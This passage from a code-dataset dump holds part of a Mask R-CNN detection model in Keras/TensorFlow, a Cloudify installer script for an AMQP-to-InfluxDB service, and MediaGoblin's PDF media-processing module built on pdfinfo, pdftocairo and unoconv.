keras.callbacks.ModelCheckpoint(self.checkpoint_path,
verbose=0, save_weights_only=True),
]
# Add custom callbacks to the list
if custom_callbacks:
callbacks += custom_callbacks
# Train
log("\nStarting at epoch {}. LR={}\n".format(self.epoch, learning_rate))
log("Checkpoint Path: {}".format(self.checkpoint_path))
self.set_trainable(layers)
self.compile(learning_rate, self.config.LEARNING_MOMENTUM)
# Work-around for Windows: Keras fails on Windows when using
# multiprocessing workers. See discussion here:
# https://github.com/matterport/Mask_RCNN/issues/13#issuecomment-353124009
if os.name == 'nt':
workers = 0
else:
workers = multiprocessing.cpu_count()
self.keras_model.fit(
train_generator,
initial_epoch=self.epoch,
epochs=epochs,
steps_per_epoch=self.config.STEPS_PER_EPOCH,
callbacks=callbacks,
validation_data=val_generator,
validation_steps=self.config.VALIDATION_STEPS,
max_queue_size=100,
workers=workers,
verbose = 1,
use_multiprocessing=workers > 1,
)
self.epoch = max(self.epoch, epochs)
def mold_inputs(self, images):
"""Takes a list of images and modifies them to the format expected
as an input to the neural network.
images: List of image matrices [height,width,depth]. Images can have
different sizes.
Returns 3 Numpy matrices:
molded_images: [N, h, w, 3]. Images resized and normalized.
image_metas: [N, length of meta data]. Details about each image.
windows: [N, (y1, x1, y2, x2)]. The portion of the image that has the
original image (padding excluded).
"""
molded_images = []
image_metas = []
windows = []
for image in images:
# Resize image
# TODO: move resizing to mold_image()
molded_image, window, scale, padding, crop = utils.resize_image(
image,
min_dim=self.config.IMAGE_MIN_DIM,
min_scale=self.config.IMAGE_MIN_SCALE,
max_dim=self.config.IMAGE_MAX_DIM,
mode=self.config.IMAGE_RESIZE_MODE)
molded_image = mold_image(molded_image, self.config)
# Build image_meta
image_meta = compose_image_meta(
0, image.shape, molded_image.shape, window, scale,
np.zeros([self.config.NUM_CLASSES], dtype=np.int32))
# Append
molded_images.append(molded_image)
windows.append(window)
image_metas.append(image_meta)
# Pack into arrays
molded_images = np.stack(molded_images)
image_metas = np.stack(image_metas)
windows = np.stack(windows)
return molded_images, image_metas, windows
def unmold_detections(self, detections, mrcnn_mask, original_image_shape,
image_shape, window):
"""Reformats the detections of one image from the format of the neural
network output to a format suitable for use in the rest of the
application.
detections: [N, (y1, x1, y2, x2, class_id, score)] in normalized coordinates
mrcnn_mask: [N, height, width, num_classes]
original_image_shape: [H, W, C] Original image shape before resizing
image_shape: [H, W, C] Shape of the image after resizing and padding
window: [y1, x1, y2, x2] Pixel coordinates of box in the image where the real
image is excluding the padding.
Returns:
boxes: [N, (y1, x1, y2, x2)] Bounding boxes in pixels
class_ids: [N] Integer class IDs for each bounding box
scores: [N] Float probability scores of the class_id
masks: [height, width, num_instances] Instance masks
"""
# How many detections do we have?
# Detections array is padded with zeros. Find the first class_id == 0.
zero_ix = np.where(detections[:, 4] == 0)[0]
N = zero_ix[0] if zero_ix.shape[0] > 0 else detections.shape[0]
# Extract boxes, class_ids, scores, and class-specific masks
boxes = detections[:N, :4]
class_ids = detections[:N, 4].astype(np.int32)
scores = detections[:N, 5]
masks = mrcnn_mask[np.arange(N), :, :, class_ids]
# Translate normalized coordinates in the resized image to pixel
# coordinates in the original image before resizing
window = utils.norm_boxes(window, image_shape[:2])
wy1, wx1, wy2, wx2 = window
shift = np.array([wy1, wx1, wy1, wx1])
wh = wy2 - wy1 # window height
ww = wx2 - wx1 # window width
scale = np.array([wh, ww, wh, ww])
# Convert boxes to normalized coordinates on the window
boxes = np.divide(boxes - shift, scale)
# Convert boxes to pixel coordinates on the original image
boxes = utils.denorm_boxes(boxes, original_image_shape[:2])
# Filter out detections with zero area. Happens in early training when
# network weights are still random
exclude_ix = np.where(
(boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
masks = np.delete(masks, exclude_ix, axis=0)
N = class_ids.shape[0]
# Resize masks to original image size and set boundary threshold.
full_masks = []
for i in range(N):
# Convert neural network mask to full size mask
full_mask = utils.unmold_mask(masks[i], boxes[i], original_image_shape)
full_masks.append(full_mask)
full_masks = np.stack(full_masks, axis=-1)\
if full_masks else np.empty(original_image_shape[:2] + (0,))
return boxes, class_ids, scores, full_masks
def detect(self, images, verbose=0):
"""Runs the detection pipeline.
images: List of images, potentially of different sizes.
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
assert self.mode == "inference", "Create model in inference mode."
assert len(
images) == self.config.BATCH_SIZE, "len(images) must be equal to BATCH_SIZE"
if verbose:
log("Processing {} images".format(len(images)))
for image in images:
log("image", image)
# Mold inputs to format expected by the neural network
molded_images, image_metas, windows = self.mold_inputs(images)
# Validate image sizes
# All images in a batch MUST be of the same size
image_shape = molded_images[0].shape
for g in molded_images[1:]:
assert g.shape == image_shape,\
"After resizing, all images must have the same size. Check IMAGE_RESIZE_MODE and image sizes."
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
if verbose:
log("molded_images", molded_images)
log("image_metas", image_metas)
log("anchors", anchors)
# Run object detection
detections, _, _, mrcnn_mask, _, _, _ =\
self.keras_model.predict([molded_images, image_metas, anchors], verbose=0)
# Process detections
results = []
for i, image in enumerate(images):
final_rois, final_class_ids, final_scores, final_masks =\
self.unmold_detections(detections[i], mrcnn_mask[i],
image.shape, molded_images[i].shape,
windows[i])
results.append({
"rois": final_rois,
"class_ids": final_class_ids,
"scores": final_scores,
"masks": final_masks,
})
return results
def detect_molded(self, molded_images, image_metas, verbose=0):
"""Runs the detection pipeline, but expect inputs that are
molded already. Used mostly for debugging and inspecting
the model.
molded_images: List of images loaded using load_image_gt()
image_metas: image meta data, also returned by load_image_gt()
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
assert self.mode == "inference", "Create model in inference mode."
assert len(molded_images) == self.config.BATCH_SIZE,\
"Number of images must be equal to BATCH_SIZE"
if verbose:
log("Processing {} images".format(len(molded_images)))
for image in molded_images:
log("image", image)
# Validate image sizes
# All images in a batch MUST be of the same size
image_shape = molded_images[0].shape
for g in molded_images[1:]:
assert g.shape == image_shape, "Images must have the same size"
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
if verbose:
log("molded_images", molded_images)
log("image_metas", image_metas)
log("anchors", anchors)
# Run object detection
detections, _, _, mrcnn_mask, _, _, _ =\
self.keras_model.predict([molded_images, image_metas, anchors], verbose=0)
# Process detections
results = []
for i, image in enumerate(molded_images):
window = [0, 0, image.shape[0], image.shape[1]]
final_rois, final_class_ids, final_scores, final_masks =\
self.unmold_detections(detections[i], mrcnn_mask[i],
image.shape, molded_images[i].shape,
window)
results.append({
"rois": final_rois,
"class_ids": final_class_ids,
"scores": final_scores,
"masks": final_masks,
})
return results
def get_anchors(self, image_shape):
"""Returns anchor pyramid for the given image size."""
backbone_shapes = compute_backbone_shapes(self.config, image_shape)
# Cache anchors and reuse if image shape is the same
if not hasattr(self, "_anchor_cache"):
self._anchor_cache = {}
if not tuple(image_shape) in self._anchor_cache:
# Generate Anchors
a = utils.generate_pyramid_anchors(
self.config.RPN_ANCHOR_SCALES,
self.config.RPN_ANCHOR_RATIOS,
backbone_shapes,
self.config.BACKBONE_STRIDES,
self.config.RPN_ANCHOR_STRIDE)
# Keep a copy of the latest anchors in pixel coordinates because
# it's used in inspect_model notebooks.
# TODO: Remove this after the notebook are refactored to not use it
self.anchors = a
# Normalize coordinates
self._anchor_cache[tuple(image_shape)] = utils.norm_boxes(a, image_shape[:2])
return self._anchor_cache[tuple(image_shape)]
def ancestor(self, tensor, name, checked=None):
"""Finds the ancestor of a TF tensor in the computation graph.
tensor: TensorFlow symbolic tensor.
name: Name of ancestor tensor to find
checked: For internal use. A list of tensors that were already
searched to avoid loops in traversing the graph.
"""
checked = checked if checked is not None else []
# Put a limit on how deep we go to avoid very long loops
if len(checked) > 500:
return None
# Convert name to a regex and allow matching a number prefix
# because Keras adds them automatically
if isinstance(name, str):
name = re.compile(name.replace("/", r"(\_\d+)*/"))
parents = tensor.op.inputs
for p in parents:
if p in checked:
continue
if bool(re.fullmatch(name, p.name)):
return p
checked.append(p)
a = self.ancestor(p, name, checked)
if a is not None:
return a
return None
def find_trainable_layer(self, layer):
"""If a layer is encapsulated by another layer, this function
digs through the encapsulation and returns the layer that holds
the weights.
"""
if layer.__class__.__name__ == 'TimeDistributed':
return self.find_trainable_layer(layer.layer)
return layer
def get_trainable_layers(self):
"""Returns a list of layers that have weights."""
layers = []
# Loop through all layers
for l in self.keras_model.layers:
# If layer is a wrapper, find inner trainable layer
l = self.find_trainable_layer(l)
# Include layer if it has weights
if l.get_weights():
layers.append(l)
return layers
def run_graph(self, images, outputs, image_metas=None):
"""Runs a sub-set of the computation graph that computes the given
outputs.
image_metas: If provided, the images are assumed to be already
molded (i.e. resized, padded, and normalized)
outputs: List of tuples (name, tensor) to compute. The tensors are
symbolic TensorFlow tensors and the names are for easy tracking.
Returns an ordered dict of results. Keys are the names received in the
input and values are Numpy arrays.
"""
model = self.keras_model
# Organize desired outputs into an ordered dict
outputs = OrderedDict(outputs)
for o in outputs.values():
assert o is not None
# Build a Keras function to run parts of the computation graph
inputs = model.inputs
# if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
# inputs += [K.learning_phase()]
kf = K.function(model.inputs, list(outputs.values()))
# Prepare inputs
if image_metas is None:
molded_images, image_metas, _ = self.mold_inputs(images)
else:
molded_images = images
image_shape = molded_images[0].shape
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
model_in = [molded_images, image_metas, anchors]
# Run inference
# if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
# model_in.append(0.)
outputs_np = kf(model_in)
# Pack the generated Numpy arrays into a a dict and log the results.
outputs_np = OrderedDict([(k, v)
for k, v in zip(outputs.keys(), outputs_np)])
for k, v in outputs_np.items():
log(k, v)
return outputs_np
############################################################
# Data Formatting
############################################################
def compose_image_meta(image_id, original_image_shape, image_shape,
window, scale, active_class_ids):
"""Takes attributes of an image and puts them in one 1D array.
image_id: An int ID of the image. Useful for debugging.
original_image_shape: [H, W, C] before resizing or padding.
image_shape: [H, W, C] after resizing and padding
window: (y1, x1, y2, x2) in pixels. The area of the image where the real
image is (excluding the padding)
scale: The scaling factor applied to the original image (float32)
active_class_ids: List of class_ids available in the dataset from which
the image came. Useful if training on images from multiple datasets
where not all classes are present in all datasets.
"""
meta = np.array(
[image_id] + # size=1
list(original_image_shape) + # size=3
list(image_shape) + # size=3
list(window) + # size=4 (y1, x1, y2, x2) in image cooredinates
[scale] + # size=1
list(active_class_ids) # size=num_classes
)
return meta
def parse_image_meta(meta):
"""Parses an array that contains image attributes to its components.
See compose_image_meta() for more details.
meta: [batch, meta length] where meta length depends on NUM_CLASSES
Returns a dict of the parsed values.
"""
image_id = meta[:, 0]
original_image_shape = meta[:, 1:4]
image_shape = meta[:, 4:7]
window = meta[:, 7:11] # (y1, x1, y2, x2) window of image in in pixels
scale = meta[:, 11]
active_class_ids = meta[:, 12:]
return {
"image_id": image_id.astype(np.int32),
"original_image_shape": original_image_shape.astype(np.int32),
"image_shape": image_shape.astype(np.int32),
"window": window.astype(np.int32),
"scale": scale.astype(np.float32),
"active_class_ids": active_class_ids.astype(np.int32),
}
def parse_image_meta_graph(meta):
"""Parses a tensor that contains image attributes to its components.
See compose_image_meta() for more details.
meta: [batch, meta length] where meta length depends on NUM_CLASSES
Returns a dict of the parsed tensors.
"""
image_id = meta[:, 0]
original_image_shape = meta[:, 1:4]
image_shape = meta[:, 4:7]
window = meta[:, 7:11] # (y1, x1, y2, x2) window of image in in pixels
scale = meta[:, 11]
active_class_ids = meta[:, 12:]
return {
"image_id": image_id,
"original_image_shape": original_image_shape,
"image_shape": image_shape,
"window": window,
"scale": scale,
"active_class_ids": active_class_ids,
}
def mold_image(images, config):
"""Expects an RGB image (or array of images) and subtracts
the mean pixel and converts it to float. Expects image
colors in RGB order.
"""
return images.astype(np.float32) - config.MEAN_PIXEL
def unmold_image(normalized_images, config):
"""Takes a image normalized with mold() and returns the original."""
return (normalized_images + config.MEAN_PIXEL).astype(np.uint8)
############################################################
# Miscellenous Graph Functions
############################################################
def trim_zeros_graph(boxes, name='trim_zeros'):
"""Often boxes are represented with matrices of shape [N, 4] and
are padded with zeros. This removes zero boxes.
boxes: [N, 4] matrix of boxes.
non_zeros: [N] a 1D boolean mask identifying the rows to keep
"""
non_zeros = tf.cast(tf.reduce_sum(input_tensor=tf.abs(boxes), axis=1), tf.bool)
boxes = tf.boolean_mask(tensor=boxes, mask=non_zeros, name=name)
return boxes, non_zeros
def batch_pack_graph(x, counts, num_rows):
"""Picks different number of values from each row
in x depending on the values in counts.
"""
outputs = []
for i in range(num_rows):
outputs.append(x[i, :counts[i]])
return tf.concat(outputs, axis=0)
def norm_boxes_graph(boxes, shape):
"""Converts boxes from pixel coordinates to normalized coordinates.
boxes: [..., (y1, x1, y2, x2)] in pixel coordinates
shape: [..., (height, width)] in pixels
Note: In pixel coordinates (y2, x2) is outside the box. But in normalized
coordinates it's inside the box.
Returns:
[..., (y1, x1, y2, x2)] in normalized coordinates
"""
h, w = tf.split(tf.cast(shape, tf.float32), 2)
scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0)
shift = tf.constant([0., 0., 1., 1.])
return tf.divide(boxes - shift, scale)
def denorm_boxes_graph(boxes, shape):
"""Converts boxes from normalized coordinates to pixel coordinates.
boxes: [..., (y1, x1, y2, x2)] in normalized coordinates
shape: [..., (height, width)] in pixels
Note: In pixel coordinates (y2, x2) is outside the box. But in normalized
coordinates it's inside the box.
Returns:
[..., (y1, x1, y2, x2)] in pixel coordinates
"""
h, w = tf.split(tf.cast(shape, tf.float32), 2)
scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0)
shift = tf.constant([0., 0., 1., 1.])
return tf.cast(tf.round(tf.multiply(boxes, scale) + shift), tf.int32)
| 44.315789
| 115
| 0.613015
|
d0dc3b3be21bc4da5f2bab824a06a0c325eb6e88
| 2,064
|
py
|
Python
|
components/amqpinflux/scripts/create.py
|
cloudify-cosmo/cloudify-manager-blueprints
|
1908c1a0615fb15cbb118335aa2f9e055b9e5779
|
[
"Apache-2.0"
] | 35
|
2015-03-07T13:30:58.000Z
|
2022-02-14T11:44:48.000Z
|
components/amqpinflux/scripts/create.py
|
cloudify-cosmo/cloudify-manager-blueprints
|
1908c1a0615fb15cbb118335aa2f9e055b9e5779
|
[
"Apache-2.0"
] | 101
|
2015-03-18T03:07:57.000Z
|
2019-02-07T12:06:42.000Z
|
components/amqpinflux/scripts/create.py
|
cloudify-cosmo/cloudify-manager-blueprints
|
1908c1a0615fb15cbb118335aa2f9e055b9e5779
|
[
"Apache-2.0"
] | 76
|
2015-01-08T10:33:03.000Z
|
2021-05-11T08:45:50.000Z
|
#!/usr/bin/env python
import os
from os.path import join, dirname
from cloudify import ctx
ctx.download_resource(
join('components', 'utils.py'),
join(dirname(__file__), 'utils.py'))
import utils # NOQA
SERVICE_NAME = 'amqpinflux'
# Some runtime properties to be used in teardown
runtime_props = ctx.instance.runtime_properties
runtime_props['service_name'] = SERVICE_NAME
AMQPINFLUX_USER = SERVICE_NAME
AMQPINFLUX_GROUP = SERVICE_NAME
runtime_props['service_user'] = AMQPINFLUX_USER
runtime_props['service_group'] = AMQPINFLUX_GROUP
HOME_DIR = join('/opt', SERVICE_NAME)
runtime_props['files_to_remove'] = [HOME_DIR]
ctx_properties = ctx.node.properties.get_all()
def _install_optional(amqpinflux_venv):
ctx.logger.info('Installing optional modules...')
amqpinflux_source_url = ctx_properties['amqpinflux_module_source_url']
# this allows to upgrade amqpinflux if necessary.
if amqpinflux_source_url:
utils.install_python_package(amqpinflux_source_url, amqpinflux_venv)
def install_amqpinflux():
amqpinflux_rpm_source_url = \
ctx_properties['amqpinflux_rpm_source_url']
# injected as an input to the script
ctx.instance.runtime_properties['influxdb_endpoint_ip'] = \
os.environ['INFLUXDB_ENDPOINT_IP']
ctx.instance.runtime_properties['rabbitmq_endpoint_ip'] = \
utils.get_rabbitmq_endpoint_ip()
amqpinflux_venv = '{0}/env'.format(HOME_DIR)
ctx.logger.info('Installing AQMPInflux...')
utils.set_selinux_permissive()
utils.copy_notice(SERVICE_NAME)
utils.mkdir(HOME_DIR)
utils.yum_install(amqpinflux_rpm_source_url,
service_name=SERVICE_NAME)
_install_optional(amqpinflux_venv)
ctx.logger.info('Configuring AMQPInflux...')
utils.create_service_user(AMQPINFLUX_USER, AMQPINFLUX_GROUP, HOME_DIR)
ctx.instance.runtime_properties['broker_cert_path'] = \
utils.INTERNAL_CA_CERT_PATH
utils.chown(AMQPINFLUX_USER, AMQPINFLUX_GROUP, HOME_DIR)
utils.systemd.configure(SERVICE_NAME)
install_amqpinflux()
| 29.913043
| 76
| 0.758721
|
3792cfbda571c1aaf89c6eeb338e53fc010f79a7
| 17,009
|
py
|
Python
|
mediagoblin/media_types/pdf/processing.py
|
eliroca/mediagoblin-imported
|
c4599508b02f2e61df3a97ff314766a62a3e5934
|
[
"CC0-1.0"
] | 1
|
2021-09-21T02:24:43.000Z
|
2021-09-21T02:24:43.000Z
|
mediagoblin/media_types/pdf/processing.py
|
jgarte/mediagoblin-mirror
|
c4599508b02f2e61df3a97ff314766a62a3e5934
|
[
"CC0-1.0"
] | null | null | null |
mediagoblin/media_types/pdf/processing.py
|
jgarte/mediagoblin-mirror
|
c4599508b02f2e61df3a97ff314766a62a3e5934
|
[
"CC0-1.0"
] | 1
|
2021-09-21T02:25:20.000Z
|
2021-09-21T02:25:20.000Z
|
# GNU MediaGoblin -- federated, autonomous media hosting
# Copyright (C) 2011, 2012 MediaGoblin contributors. See AUTHORS.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import os
import logging
import dateutil.parser
from subprocess import PIPE, Popen
from mediagoblin import mg_globals as mgg
from mediagoblin.processing import (
FilenameBuilder, BadMediaFail,
MediaProcessor, ProcessingManager,
request_from_args, get_process_filename,
store_public, copy_original)
from mediagoblin.tools.translate import fake_ugettext_passthrough as _
_log = logging.getLogger(__name__)
MEDIA_TYPE = 'mediagoblin.media_types.pdf'
# TODO - cache (memoize) util
# This is a list created via uniconv --show and hand removing some types that
# we already support via other media types better.
unoconv_supported = [
'bib', # - BibTeX [.bib]
#bmp - Windows Bitmap [.bmp]
'csv', # - Text CSV [.csv]
'dbf', # - dBASE [.dbf]
'dif', # - Data Interchange Format [.dif]
'doc6', # - Microsoft Word 6.0 [.doc]
'doc95', # - Microsoft Word 95 [.doc]
'docbook', # - DocBook [.xml]
'doc', # - Microsoft Word 97/2000/XP [.doc]
'docx7', # - Microsoft Office Open XML [.docx]
'docx', # - Microsoft Office Open XML [.docx]
#emf - Enhanced Metafile [.emf]
'eps', # - Encapsulated PostScript [.eps]
'fodp', # - OpenDocument Presentation (Flat XML) [.fodp]
'fods', # - OpenDocument Spreadsheet (Flat XML) [.fods]
'fodt', # - OpenDocument Text (Flat XML) [.fodt]
#gif - Graphics Interchange Format [.gif]
'html', # - HTML Document (OpenOffice.org Writer) [.html]
#jpg - Joint Photographic Experts Group [.jpg]
'latex', # - LaTeX 2e [.ltx]
'mediawiki', # - MediaWiki [.txt]
'met', # - OS/2 Metafile [.met]
'odd', # - OpenDocument Drawing [.odd]
'odg', # - ODF Drawing (Impress) [.odg]
'odp', # - ODF Presentation [.odp]
'ods', # - ODF Spreadsheet [.ods]
'odt', # - ODF Text Document [.odt]
'ooxml', # - Microsoft Office Open XML [.xml]
'otg', # - OpenDocument Drawing Template [.otg]
'otp', # - ODF Presentation Template [.otp]
'ots', # - ODF Spreadsheet Template [.ots]
'ott', # - Open Document Text [.ott]
#pbm - Portable Bitmap [.pbm]
#pct - Mac Pict [.pct]
'pdb', # - AportisDoc (Palm) [.pdb]
#pdf - Portable Document Format [.pdf]
#pgm - Portable Graymap [.pgm]
#png - Portable Network Graphic [.png]
'pot', # - Microsoft PowerPoint 97/2000/XP Template [.pot]
'potm', # - Microsoft PowerPoint 2007/2010 XML Template [.potm]
#ppm - Portable Pixelmap [.ppm]
'pps', # - Microsoft PowerPoint 97/2000/XP (Autoplay) [.pps]
'ppt', # - Microsoft PowerPoint 97/2000/XP [.ppt]
'pptx', # - Microsoft PowerPoint 2007/2010 XML [.pptx]
'psw', # - Pocket Word [.psw]
'pwp', # - PlaceWare [.pwp]
'pxl', # - Pocket Excel [.pxl]
#ras - Sun Raster Image [.ras]
'rtf', # - Rich Text Format [.rtf]
'sda', # - StarDraw 5.0 (OpenOffice.org Impress) [.sda]
'sdc3', # - StarCalc 3.0 [.sdc]
'sdc4', # - StarCalc 4.0 [.sdc]
'sdc', # - StarCalc 5.0 [.sdc]
'sdd3', # - StarDraw 3.0 (OpenOffice.org Impress) [.sdd]
'sdd4', # - StarImpress 4.0 [.sdd]
'sdd', # - StarImpress 5.0 [.sdd]
'sdw3', # - StarWriter 3.0 [.sdw]
'sdw4', # - StarWriter 4.0 [.sdw]
'sdw', # - StarWriter 5.0 [.sdw]
'slk', # - SYLK [.slk]
'stc', # - OpenOffice.org 1.0 Spreadsheet Template [.stc]
'std', # - OpenOffice.org 1.0 Drawing Template [.std]
'sti', # - OpenOffice.org 1.0 Presentation Template [.sti]
'stw', # - Open Office.org 1.0 Text Document Template [.stw]
#svg - Scalable Vector Graphics [.svg]
'svm', # - StarView Metafile [.svm]
'swf', # - Macromedia Flash (SWF) [.swf]
'sxc', # - OpenOffice.org 1.0 Spreadsheet [.sxc]
'sxd3', # - StarDraw 3.0 [.sxd]
'sxd5', # - StarDraw 5.0 [.sxd]
'sxd', # - OpenOffice.org 1.0 Drawing (OpenOffice.org Impress) [.sxd]
'sxi', # - OpenOffice.org 1.0 Presentation [.sxi]
'sxw', # - Open Office.org 1.0 Text Document [.sxw]
#text - Text Encoded [.txt]
#tiff - Tagged Image File Format [.tiff]
#txt - Text [.txt]
'uop', # - Unified Office Format presentation [.uop]
'uos', # - Unified Office Format spreadsheet [.uos]
'uot', # - Unified Office Format text [.uot]
'vor3', # - StarDraw 3.0 Template (OpenOffice.org Impress) [.vor]
'vor4', # - StarWriter 4.0 Template [.vor]
'vor5', # - StarDraw 5.0 Template (OpenOffice.org Impress) [.vor]
'vor', # - StarCalc 5.0 Template [.vor]
#wmf - Windows Metafile [.wmf]
'xhtml', # - XHTML Document [.html]
'xls5', # - Microsoft Excel 5.0 [.xls]
'xls95', # - Microsoft Excel 95 [.xls]
'xls', # - Microsoft Excel 97/2000/XP [.xls]
'xlt5', # - Microsoft Excel 5.0 Template [.xlt]
'xlt95', # - Microsoft Excel 95 Template [.xlt]
'xlt', # - Microsoft Excel 97/2000/XP Template [.xlt]
#xpm - X PixMap [.xpm]
]
def is_unoconv_working():
# TODO: must have libreoffice-headless installed too, need to check for it
unoconv = where('unoconv')
if not unoconv:
return False
try:
proc = Popen([unoconv, '--show'], stderr=PIPE)
output = proc.stderr.read()
except OSError:
_log.warn(_('unoconv failing to run, check log file'))
return False
if b'ERROR' in output:
return False
return True
def supported_extensions(cache=[None]):
if cache[0] == None:
cache[0] = 'pdf'
if is_unoconv_working():
cache.extend(unoconv_supported)
return cache
def where(name):
for p in os.environ['PATH'].split(os.pathsep):
fullpath = os.path.join(p, name)
if os.path.exists(fullpath):
return fullpath
return None
def check_prerequisites():
if not where('pdfinfo'):
_log.warn('missing pdfinfo')
return False
if not where('pdftocairo'):
_log.warn('missing pdfcairo')
return False
return True
def sniff_handler(media_file, filename):
_log.info('Sniffing {}'.format(MEDIA_TYPE))
if not check_prerequisites():
return None
name, ext = os.path.splitext(filename)
clean_ext = ext[1:].lower()
if clean_ext in supported_extensions():
return MEDIA_TYPE
def create_pdf_thumb(original, thumb_filename, width, height):
# Note: pdftocairo adds '.png', remove it
thumb_filename = thumb_filename[:-4]
executable = where('pdftocairo')
args = [executable, '-scale-to', str(min(width, height)),
'-singlefile', '-png', original, thumb_filename]
_log.debug('calling {}'.format(repr(' '.join(args))))
Popen(executable=executable, args=args).wait()
def pdf_info(original):
"""
Extract dictionary of pdf information. This could use a library instead
of a process.
Note: I'm assuming pdfinfo output is sanitized (integers where integers are
expected, etc.) - if this is wrong then an exception will be raised and caught
leading to the dreaded error page. It seems a safe assumption.
"""
ret_dict = {}
pdfinfo = where('pdfinfo')
try:
proc = Popen(executable=pdfinfo,
args=[pdfinfo, original], stdout=PIPE)
lines = proc.stdout.readlines()
except OSError:
_log.debug('pdfinfo could not read the pdf file.')
raise BadMediaFail()
lines = [l.decode('utf-8', 'replace') for l in lines]
info_dict = dict([[part.strip() for part in l.strip().split(':', 1)]
for l in lines if ':' in l])
if 'Page size' not in info_dict.keys():
# TODO - message is for the user, not debug, but BadMediaFail not taking an argument, fix that.
_log.debug('Missing "Page size" key in returned pdf - conversion failed?')
raise BadMediaFail()
for date_key in [('pdf_mod_date', 'ModDate'),
('pdf_creation_date', 'CreationDate')]:
if date_key in info_dict:
ret_dict[date_key] = dateutil.parser.parse(info_dict[date_key])
for db_key, int_key in [('pdf_pages', 'Pages')]:
if int_key in info_dict:
ret_dict[db_key] = int(info_dict[int_key])
# parse 'PageSize' field: 595 x 842 pts (A4)
page_size_parts = info_dict['Page size'].split()
ret_dict['pdf_page_size_width'] = float(page_size_parts[0])
ret_dict['pdf_page_size_height'] = float(page_size_parts[2])
for db_key, str_key in [('pdf_keywords', 'Keywords'),
('pdf_creator', 'Creator'), ('pdf_producer', 'Producer'),
('pdf_author', 'Author'), ('pdf_title', 'Title')]:
ret_dict[db_key] = info_dict.get(str_key, None)
ret_dict['pdf_version_major'], ret_dict['pdf_version_minor'] = \
map(int, info_dict['PDF version'].split('.'))
return ret_dict
class CommonPdfProcessor(MediaProcessor):
"""
Provides a base for various pdf processing steps
"""
acceptable_files = ['original', 'pdf']
def common_setup(self):
"""
Set up common pdf processing steps
"""
# Pull down and set up the processing file
self.process_filename = get_process_filename(
self.entry, self.workbench, self.acceptable_files)
self.name_builder = FilenameBuilder(self.process_filename)
self._set_pdf_filename()
def _set_pdf_filename(self):
if self.name_builder.ext == '.pdf':
self.pdf_filename = self.process_filename
elif self.entry.media_files.get('pdf'):
self.pdf_filename = self.workbench.localized_file(
mgg.public_store, self.entry.media_files['pdf'])
else:
self.pdf_filename = self._generate_pdf()
def _skip_processing(self, keyname, **kwargs):
file_metadata = self.entry.get_file_metadata(keyname)
skip = True
if not file_metadata:
return False
if keyname == 'thumb':
if kwargs.get('thumb_size') != file_metadata.get('thumb_size'):
skip = False
elif keyname == 'medium':
if kwargs.get('size') != file_metadata.get('size'):
skip = False
return skip
def copy_original(self):
copy_original(
self.entry, self.process_filename,
self.name_builder.fill('{basename}{ext}'))
def generate_thumb(self, thumb_size=None):
if not thumb_size:
thumb_size = (mgg.global_config['media:thumb']['max_width'],
mgg.global_config['media:thumb']['max_height'])
if self._skip_processing('thumb', thumb_size=thumb_size):
return
# Note: pdftocairo adds '.png', so don't include an ext
thumb_filename = os.path.join(self.workbench.dir,
self.name_builder.fill(
'{basename}.thumbnail'))
executable = where('pdftocairo')
args = [executable, '-scale-to', str(min(thumb_size)),
'-singlefile', '-png', self.pdf_filename, thumb_filename]
_log.debug('calling {}'.format(repr(' '.join(args))))
Popen(executable=executable, args=args).wait()
# since pdftocairo added '.png', we need to include it with the
# filename
store_public(self.entry, 'thumb', thumb_filename + '.png',
self.name_builder.fill('{basename}.thumbnail.png'))
self.entry.set_file_metadata('thumb', thumb_size=thumb_size)
def _generate_pdf(self):
"""
Store the pdf. If the file is not a pdf, make it a pdf
"""
tmp_pdf = os.path.splitext(self.process_filename)[0] + '.pdf'
unoconv = where('unoconv')
args = [unoconv, '-v', '-f', 'pdf', self.process_filename]
_log.debug('calling %s' % repr(args))
Popen(executable=unoconv,
args=args).wait()
if not os.path.exists(tmp_pdf):
_log.debug('unoconv failed to convert file to pdf')
raise BadMediaFail()
store_public(self.entry, 'pdf', tmp_pdf,
self.name_builder.fill('{basename}.pdf'))
return self.workbench.localized_file(
mgg.public_store, self.entry.media_files['pdf'])
def extract_pdf_info(self):
pdf_info_dict = pdf_info(self.pdf_filename)
self.entry.media_data_init(**pdf_info_dict)
def generate_medium(self, size=None):
if not size:
size = (mgg.global_config['media:medium']['max_width'],
mgg.global_config['media:medium']['max_height'])
if self._skip_processing('medium', size=size):
return
# Note: pdftocairo adds '.png', so don't include an ext
filename = os.path.join(self.workbench.dir,
self.name_builder.fill('{basename}.medium'))
executable = where('pdftocairo')
